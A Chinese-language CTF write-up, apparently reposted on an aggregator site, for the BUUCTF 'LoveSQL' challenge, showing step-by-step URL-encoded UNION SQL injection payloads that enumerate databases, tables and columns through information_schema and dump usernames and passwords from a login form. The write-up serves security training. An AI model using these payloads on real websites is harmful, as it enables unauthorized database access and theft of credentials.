美文网首页
BUUCTF-[极客大挑战 2019]LoveSQL 记录

BUUCTF-[极客大挑战 2019]LoveSQL 记录

作者: 低调求发展 | 来源:发表于2020-10-23 09:18 被阅读0次

[极客大挑战 2019]LoveSQL

首先打开一个登录界面,用sqlmap是没有灵魂的

测试下是否有注入

查看字段:4报错,说明3个字段

先查询数据库

username=admin&password=1%27+union+select+1%2C2%2Cgroup_concat%28schema_name%29+from+information_schema.schemata%23

有这些数据库,当前数据库为geek

查表:

username=admin&password=1%27+union+select+1%2C2%2Cgroup_concat%28table_name%29+from+information_schema.tables where table_schema =database()%23

两张表,后面测试flag在l0ve1ysq1表

查字段:

1%27+union+select+1%2C2%2Cgroup_concat%28column_name%29+from+information_schema.columns where table_schema =database() and table_name = 'l0ve1ysq1'%23

查数据:

1%27+union+select+1%2C2%2Cgroup_concat(username,password) from geek.l0ve1ysq1%23

出现flag,这样看不清,查看源代码:

相关文章

网友评论

      本文标题:BUUCTF-[极客大挑战 2019]LoveSQL 记录

      本文链接:https://www.haomeiwen.com/subject/suflmktx.html

      延伸阅读

      深度阅读

      • 您也可以注册成为美文阅读网的作者,发表您的原创作品、分享您的心情!

      栏目导航

      热点阅读

      关于我们|服务条款|联系我们|BUUCTF-[极客大挑战 2019]LoveSQL 记录|投稿指南|网站地图|RSS订阅|排版工具|手机版

      提供经典美文摘抄,优美散文欣赏,现代诗歌精选,短篇小说,心情随笔,表白情书范文,故事会在线阅读欣赏

      Copyright © 2014-2023 Haomeiwen.com All Rights Reserved. 好美文阅读网 版权所有

      备案信息:桂公网安备 45052102000051号 · 桂ICP备13007215号-3

      本站所收录作品、热点评论等信息部分来源互联网,目的只是为了系统归纳学习和传递资讯

      所有作品版权归原创作者所有,与本站立场无关,如不慎侵犯了你的权益,请联系我们告知,我们将做删除处理!